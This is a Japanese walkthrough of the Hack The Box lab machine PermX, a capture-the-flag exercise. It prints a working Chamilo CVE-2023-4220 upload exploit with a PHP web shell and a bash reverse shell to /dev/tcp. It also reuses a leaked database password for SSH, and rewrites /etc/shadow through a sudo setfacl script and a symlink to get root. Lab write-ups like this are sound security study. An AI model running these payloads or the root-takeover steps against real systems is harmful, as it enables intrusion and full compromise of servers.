こちらもSeason 5。 EASYマシンだとパスワード見つけたら取りあえずログイン試す、みたいなので入れること多い気がする。
HTB PermX
nmap
# hosts 追加 echo "10.129.135.205 permx.htb" | sudo tee -a /etc/hosts
$ nmap -sC -A permx.htb PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 256 e2:5c:5d:8c:47:3e:d8:72:f7:b4:80:03:49:86:6d:ef (ECDSA) |_ 256 1f:41:02:8e:6b:17:18:9c:a0:ac:54:23:e9:71:30:17 (ED25519) 80/tcp open http Apache httpd 2.4.52 |_http-title: Did not follow redirect to http://permx.htb |_http-server-header: Apache/2.4.52 (Ubuntu) No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
- SSH/HTTP のいつもの構成
http://permx.htb/
- http://permx.htb/
- eLEARNING Loadingめっちゃ回ってて草
- wow.jsらしい https://wowjs.uk/
- pagesの下にコンテンツある 404とかも
- SSIかなあ?
サブドメイン探索
ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt \ -H "Host: FUZZ.permx.htb" -u http://permx.htb/ -fc 302 www [Status: 200, Size: 36182, Words: 12829, Lines: 587, Duration: 497ms] lms [Status: 200, Size: 19347, Words: 4910, Lines: 353, Duration: 286ms]
echo "10.129.135.205 www.permx.htb" | sudo tee -a /etc/hosts echo "10.129.135.205 lms.permx.htb" | sudo tee -a /etc/hosts
http://lms.permx.htb/
- http://lms.permx.htb/
- http://lms.permx.htb/main/auth/lostPassword.php
- パスワードリセット
- test =>
There is no account with this user and/or e-mail address
- "' OR 1=1; --" => 同じ
- Bool based SQLiっぽい?と思ったけど、これ普通に製品CMSだSQLiじゃないな
Chamilo (CMS)
- そういえば管理画面よくみたらCMSっぽい
- バージョンは不明
- https://starlabs.sg/advisories/23/23-3368/
- (CVE-2023-3368) Chamilo LMS Unauthenticated Command Injection
- Exploit がありそう
- http://lms.permx.htb/main/webservices/additional_webservices.php ある
- https://starlabs.sg/advisories/23/23-3368/#proof-of-concept
- PoCコードがあるので使ってみる
cat > exploit.py python3 exploit.py -u http://lms.permx.htb/ -c 'id > /tmp/pwned' An error has occured, URL is not vulnerable: http://lms.permx.htb/
違うか
- https://starlabs.sg/advisories/23/23-3533/
- (CVE-2023-3533) Chamilo LMS Unauthenticated Remote Code Execution via Arbitrary File Write
- 他にもある
- PoCコードもあるので見てみる
python3 exploit2.py -u http://lms.permx.htb/ rce -p system id Overwriting session file at: ../../../../../../../../tmp/sess_sJY7EXvdQiMhPRqe9RGIwoF29l4geYiM Setting ch_sid=sJY7EXvdQiMhPRqe9RGIwoF29l4geYiM Invoking system() with arguments: id Found data: URL not vulnerable: http://lms.permx.htb/
これも違う
msfconsole msf6 > search CVE-2023-34960 msf6 > use exploit/linux/http/chamilo_unauth_rce_cve_2023_34960 ... [-] Exploit aborted due to failure: not-vulnerable: The target is not exploitable. No valid response received from the target. "set ForceExploit true" to override check result.
これも違うなあ
indexesがtrue?
- indexが...全部見える
- http://lms.permx.htb/web/
- http://lms.permx.htb/app/
- phpファイルは実行されてしまうけど、ymlファイルとかは全部ダウンロード出来る
- http://lms.permx.htb/app/config/
- parameters.yml.dist
parameters: database_driver: pdo_mysql database_host: 127.0.0.1 database_port: ~ database_name: chamilo111 database_user: root database_password: root mailer_transport: smtp mailer_host: 127.0.0.1 mailer_user: ~ mailer_password: ~
役に立ちそうにはないか なんかいろいろありそうだしfuzz
ffuf -w /usr/share/wordlists/dirb/common.txt -u http://lms.permx.htb/FUZZ .htaccess [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 251ms] [Status: 200, Size: 19347, Words: 4910, Lines: 353, Duration: 501ms] .hta [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 2000ms] .htpasswd [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 4703ms] app [Status: 301, Size: 312, Words: 20, Lines: 10, Duration: 440ms] bin [Status: 301, Size: 312, Words: 20, Lines: 10, Duration: 249ms] certificates [Status: 301, Size: 321, Words: 20, Lines: 10, Duration: 250ms] documentation [Status: 301, Size: 322, Words: 20, Lines: 10, Duration: 249ms] favicon.ico [Status: 200, Size: 2462, Words: 3, Lines: 2, Duration: 251ms] index.php [Status: 200, Size: 19356, Words: 4910, Lines: 353, Duration: 282ms] LICENSE [Status: 200, Size: 35147, Words: 5836, Lines: 675, Duration: 253ms] main [Status: 301, Size: 313, Words: 20, Lines: 10, Duration: 292ms] plugin [Status: 301, Size: 315, Words: 20, Lines: 10, Duration: 249ms] robots.txt [Status: 200, Size: 748, Words: 75, Lines: 34, Duration: 272ms] server-status [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 250ms] src [Status: 301, Size: 312, Words: 20, Lines: 10, Duration: 305ms] vendor [Status: 301, Size: 315, Words: 20, Lines: 10, Duration: 251ms] web.config [Status: 200, Size: 5780, Words: 1119, Lines: 107, Duration: 250ms] web [Status: 301, Size: 312, Words: 20, Lines: 10, Duration: 265ms]
あやしそうなの
- http://lms.permx.htb/certificates/
- ログインフォーム
- http://lms.permx.htb/documentation/changelog.html
- Chamilo 1.11.24 バージョンが確定
- つまり重要な脆弱性のあるバージョンじゃない
CVE-2023-4220/4224 BigUpload
こっちは学習者アカウントが必要 - https://www.cve.org/CVERecord?id=CVE-2023-4224 - https://starlabs.sg/advisories/23/23-4224/
こっちは不要 - https://www.cve.org/CVERecord?id=CVE-2023-4220 - https://github.com/charlesgargasson/CVE-2023-4220
$ cat exploit.sh #!/bin/bash HOST='http://lms.permx.htb' CMD='id' URL_UPLD='main/inc/lib/javascript/bigupload/inc/bigUpload.php?action=post-unsupported' URL_FILE='main/inc/lib/javascript/bigupload/files/rce.php' cat <<'EOF'>/tmp/rce.php <?php $a=popen(base64_decode($_REQUEST["aoOoy"]),'r');while($b=fgets($a,2048)){echo $b;ob_flush();flush();}pclose($a); ?> EOF curl -F 'bigUploadFile=@/tmp/rce.php' "$HOST/$URL_UPLD" CMD=$(echo $CMD|base64 -w0| python3 -c "import urllib.parse,sys; print(urllib.parse.quote_plus(sys.stdin.read()))") curl "$HOST/$URL_FILE?aoOoy=$CMD
└─$ sh exploit.sh The file has successfully been uploaded.uid=33(www-data) gid=33(www-data) groups=33(www-data)
できた!
└─$ head exploit.sh #!/bin/bash HOST='http://lms.permx.htb' CMD='bash -c "bash -i >& /dev/tcp/10.10.16.23/4444 0>&1"'
www-data@permx:/var/www/chamilo/main/inc/lib/javascript/bigupload/files$ whoami <ilo/main/inc/lib/javascript/bigupload/files$ whoami www-data www-data@permx:/var/www$ python3 -c 'import pty;pty.spawn("/bin/bash")' python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data => mtz
www-data@permx:/var/www$ ls -la /home ls -la /home total 12 drwxr-xr-x 3 root root 4096 Jan 20 18:10 . drwxr-xr-x 18 root root 4096 Jul 1 13:05 .. drwxr-x--- 4 mtz mtz 4096 Jun 6 05:24 mtz
- /var/www/chamilo/app/config/configuration.php
$_configuration['db_host'] = 'localhost'; $_configuration['db_port'] = '3306'; $_configuration['main_database'] = 'chamilo'; $_configuration['db_user'] = 'chamilo'; $_configuration['db_password'] = '03F6lY3uXAP2bkW8';
DBパスワードありそうだけど、さて...
ssh mtz@permx.htb mtz@permx.htb's password: Welcome to Ubuntu 22.04.4 LTS (GNU/Linux 5.15.0-113-generic x86_64) ... mtz@permx:~$ whoami mtz mtz@permx:~$ cat user.txt XXXX
はいれた
sudo
mtz@permx:~$ sudo -l Matching Defaults entries for mtz on permx: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty User mtz may run the following commands on permx: (ALL : ALL) NOPASSWD: /opt/acl.sh
お約束のsudo抜け
mtz@permx:~$ cat /opt/acl.sh #!/bin/bash if [ "$#" -ne 3 ]; then /usr/bin/echo "Usage: $0 user perm file" exit 1 fi user="$1" perm="$2" target="$3" if [[ "$target" != /home/mtz/* || "$target" == *..* ]]; then /usr/bin/echo "Access denied." exit 1 fi # Check if the path is a file if [ ! -f "$target" ]; then /usr/bin/echo "Target must be a file." exit 1 fi /usr/bin/sudo /usr/bin/setfacl -m u:"$user":"$perm" "$target"
- setfaclってなんじゃ
- https://atmarkit.itmedia.co.jp/ait/articles/1808/23/news026.html
- https://www.mtioutput.com/entry/chmod-setfacl-differ
- ACL操作するコマンドだった (しらんかった!)
- 拡張権限が付く (+がつくよ)
sudo /opt/acl.sh root rwx /home/mtz/vi
このような実行が可能だが、script.shは "/home/mtz/" を含むこと、".."を含まないことという制限がある。 更にsymlink対策としてファイルかどうかもチェックしている。
- なんとか/opt/acl.shを編集出来るようにしたい
- /home/mtz/ は必ず必要
- .. は使えない
- ではsymlinkで対策
- ln -s / /home/mtz/root
- setfacl /home/mtz/root/shadow
- rootのパスワードを書き込む
mtz@permx:~$ ln -s / root mtz@permx:~$ sudo /opt/acl.sh mtz rwx /home/mtz/root/etc/shadow mtz@permx:~$ ls -la /etc/shadow -rw-rwx---+ 1 root shadow 1119 Jul 9 00:06 /etc/shadow mtz@permx:~$ getfacl /etc/shadow getfacl: Removing leading '/' from absolute path names # file: etc/shadow # owner: root # group: shadow user::rw- user:mtz:rwx
- なぜか3分ぐらいでパーミッション切れる...
- どうもリセットされているらしいので素早くやる
#パスワードは適当に mkpasswd -m sha-512 passwd $6$sYeguGCxuj27fXWi$11KdBNmu2T6gy1.E0STz1x26/QQdN4t05S2eAAsj57b0PrWExNtshi3L98aVW3Zkl2nXbKEewyOJcqZFoLRPL1
ln -s / /home/mtz/root sudo /opt/acl.sh mtz rwx /home/mtz/root/etc/shadow vi /etc/shadow
root@permx:/home/mtz# whoami root root@permx:/home/mtz# cat /root/root.txt XXXX
GJ!